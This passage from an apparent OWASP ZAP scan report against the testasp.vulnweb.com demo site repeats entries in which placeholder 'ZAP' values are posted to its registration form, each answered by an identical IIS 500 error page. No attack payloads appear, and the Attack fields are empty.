for, and it cannot be displayed.</h3> </fieldset></div> </div> </body> </html> |
| URL | http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowforum%2Easp%3Fid%3D0 |
| Method | POST |
| Parameter | |
| Attack | |
| Evidence | |
| Request Header - size: 463 bytes. |
POST http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowforum%2Easp%3Fid%3D0 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowforum%2Easp%3Fid%3D0 Content-Length: 47 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 47 bytes. |
tfUName=ZAP&tfRName=ZAP&tfEmail=ZAP&tfUPass=ZAP
|
| Response Header - size: 196 bytes. |
HTTP/1.1 500 Internal Server Error
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:34 GMT Content-Length: 1208 |
| Response Body - size: 1,208 bytes. |
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/> <title>500 - Internal server error.</title> <style type="text/css"> <!-- body{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;} fieldset{padding:0 15px 10px 15px;} h1{font-size:2.4em;margin:0;color:#FFF;} h2{font-size:1.7em;margin:0;color:#CC0000;} h3{font-size:1.2em;margin:10px 0 0 0;color:#000000;} #header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS", Verdana, sans-serif;color:#FFF; background-color:#555555;} #content{margin:0 0 0 2%;position:relative;} .content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;} --> </style> </head> <body> <div id="header"><h1>Server Error</h1></div> <div id="content"> <div class="content-container"><fieldset> <h2>500 - Internal server error.</h2> <h3>There is a problem with the resource you are looking for, and it cannot be displayed.</h3> </fieldset></div> </div> </body> </html> |
| URL | http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowforum%2Easp%3Fid%3D1 |
| Method | POST |
| Parameter | |
| Attack | |
| Evidence | |
| Request Header - size: 463 bytes. |
POST http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowforum%2Easp%3Fid%3D1 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowforum%2Easp%3Fid%3D1 Content-Length: 47 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 47 bytes. |
tfUName=ZAP&tfRName=ZAP&tfEmail=ZAP&tfUPass=ZAP
|
| Response Header - size: 196 bytes. |
HTTP/1.1 500 Internal Server Error
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:42 GMT Content-Length: 1208 |
| Response Body - size: 1,208 bytes. |
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/> <title>500 - Internal server error.</title> <style type="text/css"> <!-- body{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;} fieldset{padding:0 15px 10px 15px;} h1{font-size:2.4em;margin:0;color:#FFF;} h2{font-size:1.7em;margin:0;color:#CC0000;} h3{font-size:1.2em;margin:10px 0 0 0;color:#000000;} #header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS", Verdana, sans-serif;color:#FFF; background-color:#555555;} #content{margin:0 0 0 2%;position:relative;} .content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;} --> </style> </head> <body> <div id="header"><h1>Server Error</h1></div> <div id="content"> <div class="content-container"><fieldset> <h2>500 - Internal server error.</h2> <h3>There is a problem with the resource you are looking for, and it cannot be displayed.</h3> </fieldset></div> </div> </body> </html> |
| URL | http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowforum%2Easp%3Fid%3D2 |
| Method | POST |
| Parameter | |
| Attack | |
| Evidence | |
| Request Header - size: 463 bytes. |
POST http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowforum%2Easp%3Fid%3D2 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowforum%2Easp%3Fid%3D2 Content-Length: 47 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 47 bytes. |
tfUName=ZAP&tfRName=ZAP&tfEmail=ZAP&tfUPass=ZAP
|
| Response Header - size: 196 bytes. |
HTTP/1.1 500 Internal Server Error
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:48 GMT Content-Length: 1208 |
| Response Body - size: 1,208 bytes. |
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/> <title>500 - Internal server error.</title> <style type="text/css"> <!-- body{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;} fieldset{padding:0 15px 10px 15px;} h1{font-size:2.4em;margin:0;color:#FFF;} h2{font-size:1.7em;margin:0;color:#CC0000;} h3{font-size:1.2em;margin:10px 0 0 0;color:#000000;} #header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS", Verdana, sans-serif;color:#FFF; background-color:#555555;} #content{margin:0 0 0 2%;position:relative;} .content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;} --> </style> </head> <body> <div id="header"><h1>Server Error</h1></div> <div id="content"> <div class="content-container"><fieldset> <h2>500 - Internal server error.</h2> <h3>There is a problem with the resource you are looking for, and it cannot be displayed.</h3> </fieldset></div> </div> </body> </html> |
| URL | http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D0 |
| Method | POST |
| Parameter | |
| Attack | |
| Evidence | |
| Request Header - size: 465 bytes. |
POST http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D0 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D0 Content-Length: 47 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 47 bytes. |
tfUName=ZAP&tfRName=ZAP&tfEmail=ZAP&tfUPass=ZAP
|
| Response Header - size: 196 bytes. |
HTTP/1.1 500 Internal Server Error
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:53:01 GMT Content-Length: 1208 |
| Response Body - size: 1,208 bytes. |
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/> <title>500 - Internal server error.</title> <style type="text/css"> <!-- body{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;} fieldset{padding:0 15px 10px 15px;} h1{font-size:2.4em;margin:0;color:#FFF;} h2{font-size:1.7em;margin:0;color:#CC0000;} h3{font-size:1.2em;margin:10px 0 0 0;color:#000000;} #header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS", Verdana, sans-serif;color:#FFF; background-color:#555555;} #content{margin:0 0 0 2%;position:relative;} .content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;} --> </style> </head> <body> <div id="header"><h1>Server Error</h1></div> <div id="content"> <div class="content-container"><fieldset> <h2>500 - Internal server error.</h2> <h3>There is a problem with the resource you are looking for, and it cannot be displayed.</h3> </fieldset></div> </div> </body> </html> |
| URL | http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D1 |
| Method | POST |
| Parameter | |
| Attack | |
| Evidence | |
| Request Header - size: 465 bytes. |
POST http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D1 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D1 Content-Length: 47 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 47 bytes. |
tfUName=ZAP&tfRName=ZAP&tfEmail=ZAP&tfUPass=ZAP
|
| Response Header - size: 196 bytes. |
HTTP/1.1 500 Internal Server Error
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:53:00 GMT Content-Length: 1208 |
| Response Body - size: 1,208 bytes. |
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/> <title>500 - Internal server error.</title> <style type="text/css"> <!-- body{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;} fieldset{padding:0 15px 10px 15px;} h1{font-size:2.4em;margin:0;color:#FFF;} h2{font-size:1.7em;margin:0;color:#CC0000;} h3{font-size:1.2em;margin:10px 0 0 0;color:#000000;} #header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS", Verdana, sans-serif;color:#FFF; background-color:#555555;} #content{margin:0 0 0 2%;position:relative;} .content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;} --> </style> </head> <body> <div id="header"><h1>Server Error</h1></div> <div id="content"> <div class="content-container"><fieldset> <h2>500 - Internal server error.</h2> <h3>There is a problem with the resource you are looking for, and it cannot be displayed.</h3> </fieldset></div> </div> </body> </html> |
| URL | http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D10 |
| Method | POST |
| Parameter | |
| Attack | |
| Evidence | |
| Request Header - size: 467 bytes. |
POST http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D10 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D10 Content-Length: 47 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 47 bytes. |
tfUName=ZAP&tfRName=ZAP&tfEmail=ZAP&tfUPass=ZAP
|
| Response Header - size: 196 bytes. |
HTTP/1.1 500 Internal Server Error
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:53:03 GMT Content-Length: 1208 |
| Response Body - size: 1,208 bytes. |
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/> <title>500 - Internal server error.</title> <style type="text/css"> <!-- body{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;} fieldset{padding:0 15px 10px 15px;} h1{font-size:2.4em;margin:0;color:#FFF;} h2{font-size:1.7em;margin:0;color:#CC0000;} h3{font-size:1.2em;margin:10px 0 0 0;color:#000000;} #header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS", Verdana, sans-serif;color:#FFF; background-color:#555555;} #content{margin:0 0 0 2%;position:relative;} .content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;} --> </style> </head> <body> <div id="header"><h1>Server Error</h1></div> <div id="content"> <div class="content-container"><fieldset> <h2>500 - Internal server error.</h2> <h3>There is a problem with the resource you are looking for, and it cannot be displayed.</h3> </fieldset></div> </div> </body> </html> |
| URL | http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D11 |
| Method | POST |
| Parameter | |
| Attack | |
| Evidence | |
| Request Header - size: 467 bytes. |
POST http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D11 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D11 Content-Length: 47 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 47 bytes. |
tfUName=ZAP&tfRName=ZAP&tfEmail=ZAP&tfUPass=ZAP
|
| Response Header - size: 196 bytes. |
HTTP/1.1 500 Internal Server Error
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:53:04 GMT Content-Length: 1208 |
| Response Body - size: 1,208 bytes. |
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/> <title>500 - Internal server error.</title> <style type="text/css"> <!-- body{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;} fieldset{padding:0 15px 10px 15px;} h1{font-size:2.4em;margin:0;color:#FFF;} h2{font-size:1.7em;margin:0;color:#CC0000;} h3{font-size:1.2em;margin:10px 0 0 0;color:#000000;} #header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS", Verdana, sans-serif;color:#FFF; background-color:#555555;} #content{margin:0 0 0 2%;position:relative;} .content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;} --> </style> </head> <body> <div id="header"><h1>Server Error</h1></div> <div id="content"> <div class="content-container"><fieldset> <h2>500 - Internal server error.</h2> <h3>There is a problem with the resource you are looking for, and it cannot be displayed.</h3> </fieldset></div> </div> </body> </html> |
| URL | http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D12 |
| Method | POST |
| Parameter | |
| Attack | |
| Evidence | |
| Request Header - size: 467 bytes. |
POST http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D12 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D12 Content-Length: 47 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 47 bytes. |
tfUName=ZAP&tfRName=ZAP&tfEmail=ZAP&tfUPass=ZAP
|
| Response Header - size: 196 bytes. |
HTTP/1.1 500 Internal Server Error
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:53:04 GMT Content-Length: 1208 |
| Response Body - size: 1,208 bytes. |
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/> <title>500 - Internal server error.</title> <style type="text/css"> <!-- body{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;} fieldset{padding:0 15px 10px 15px;} h1{font-size:2.4em;margin:0;color:#FFF;} h2{font-size:1.7em;margin:0;color:#CC0000;} h3{font-size:1.2em;margin:10px 0 0 0;color:#000000;} #header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS", Verdana, sans-serif;color:#FFF; background-color:#555555;} #content{margin:0 0 0 2%;position:relative;} .content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;} --> </style> </head> <body> <div id="header"><h1>Server Error</h1></div> <div id="content"> <div class="content-container"><fieldset> <h2>500 - Internal server error.</h2> <h3>There is a problem with the resource you are looking for, and it cannot be displayed.</h3> </fieldset></div> </div> </body> </html> |
| URL | http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D13 |
| Method | POST |
| Parameter | |
| Attack | |
| Evidence | |
| Request Header - size: 467 bytes. |
POST http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D13 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D13 Content-Length: 47 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 47 bytes. |
tfUName=ZAP&tfRName=ZAP&tfEmail=ZAP&tfUPass=ZAP
|
| Response Header - size: 196 bytes. |
HTTP/1.1 500 Internal Server Error
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:53:04 GMT Content-Length: 1208 |
| Response Body - size: 1,208 bytes. |
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/> <title>500 - Internal server error.</title> <style type="text/css"> <!-- body{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;} fieldset{padding:0 15px 10px 15px;} h1{font-size:2.4em;margin:0;color:#FFF;} h2{font-size:1.7em;margin:0;color:#CC0000;} h3{font-size:1.2em;margin:10px 0 0 0;color:#000000;} #header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS", Verdana, sans-serif;color:#FFF; background-color:#555555;} #content{margin:0 0 0 2%;position:relative;} .content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;} --> </style> </head> <body> <div id="header"><h1>Server Error</h1></div> <div id="content"> <div class="content-container"><fieldset> <h2>500 - Internal server error.</h2> <h3>There is a problem with the resource you are looking for, and it cannot be displayed.</h3> </fieldset></div> </div> </body> </html> |
| URL | http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D14 |
| Method | POST |
| Parameter | |
| Attack | |
| Evidence | |
| Request Header - size: 467 bytes. |
POST http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D14 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D14 Content-Length: 47 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 47 bytes. |
tfUName=ZAP&tfRName=ZAP&tfEmail=ZAP&tfUPass=ZAP
|
| Response Header - size: 196 bytes. |
HTTP/1.1 500 Internal Server Error
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:53:05 GMT Content-Length: 1208 |
| Response Body - size: 1,208 bytes. |
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/> <title>500 - Internal server error.</title> <style type="text/css"> <!-- body{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;} fieldset{padding:0 15px 10px 15px;} h1{font-size:2.4em;margin:0;color:#FFF;} h2{font-size:1.7em;margin:0;color:#CC0000;} h3{font-size:1.2em;margin:10px 0 0 0;color:#000000;} #header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS", Verdana, sans-serif;color:#FFF; background-color:#555555;} #content{margin:0 0 0 2%;position:relative;} .content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;} --> </style> </head> <body> <div id="header"><h1>Server Error</h1></div> <div id="content"> <div class="content-container"><fieldset> <h2>500 - Internal server error.</h2> <h3>There is a problem with the resource you are looking for, and it cannot be displayed.</h3> </fieldset></div> </div> </body> </html> |
| URL | http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D15 |
| Method | POST |
| Parameter | |
| Attack | |
| Evidence | |
| Request Header - size: 467 bytes. |
POST http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D15 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D15 Content-Length: 47 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 47 bytes. |
tfUName=ZAP&tfRName=ZAP&tfEmail=ZAP&tfUPass=ZAP
|
| Response Header - size: 196 bytes. |
HTTP/1.1 500 Internal Server Error
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:53:05 GMT Content-Length: 1208 |
| Response Body - size: 1,208 bytes. |
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/> <title>500 - Internal server error.</title> <style type="text/css"> <!-- body{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;} fieldset{padding:0 15px 10px 15px;} h1{font-size:2.4em;margin:0;color:#FFF;} h2{font-size:1.7em;margin:0;color:#CC0000;} h3{font-size:1.2em;margin:10px 0 0 0;color:#000000;} #header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS", Verdana, sans-serif;color:#FFF; background-color:#555555;} #content{margin:0 0 0 2%;position:relative;} .content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;} --> </style> </head> <body> <div id="header"><h1>Server Error</h1></div> <div id="content"> <div class="content-container"><fieldset> <h2>500 - Internal server error.</h2> <h3>There is a problem with the resource you are looking for, and it cannot be displayed.</h3> </fieldset></div> </div> </body> </html> |
| URL | http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D16 |
| Method | POST |
| Parameter | |
| Attack | |
| Evidence | |
| Request Header - size: 467 bytes. |
POST http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D16 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D16 Content-Length: 47 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 47 bytes. |
tfUName=ZAP&tfRName=ZAP&tfEmail=ZAP&tfUPass=ZAP
|
| Response Header - size: 196 bytes. |
HTTP/1.1 500 Internal Server Error
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:53:05 GMT Content-Length: 1208 |
| Response Body - size: 1,208 bytes. |
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/> <title>500 - Internal server error.</title> <style type="text/css"> <!-- body{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;} fieldset{padding:0 15px 10px 15px;} h1{font-size:2.4em;margin:0;color:#FFF;} h2{font-size:1.7em;margin:0;color:#CC0000;} h3{font-size:1.2em;margin:10px 0 0 0;color:#000000;} #header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS", Verdana, sans-serif;color:#FFF; background-color:#555555;} #content{margin:0 0 0 2%;position:relative;} .content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;} --> </style> </head> <body> <div id="header"><h1>Server Error</h1></div> <div id="content"> <div class="content-container"><fieldset> <h2>500 - Internal server error.</h2> <h3>There is a problem with the resource you are looking for, and it cannot be displayed.</h3> </fieldset></div> </div> </body> </html> |
| URL | http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D17 |
| Method | POST |
| Parameter | |
| Attack | |
| Evidence | |
| Request Header - size: 467 bytes. |
POST http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D17 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D17 Content-Length: 47 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 47 bytes. |
tfUName=ZAP&tfRName=ZAP&tfEmail=ZAP&tfUPass=ZAP
|
| Response Header - size: 196 bytes. |
HTTP/1.1 500 Internal Server Error
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:53:05 GMT Content-Length: 1208 |
| Response Body - size: 1,208 bytes. |
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
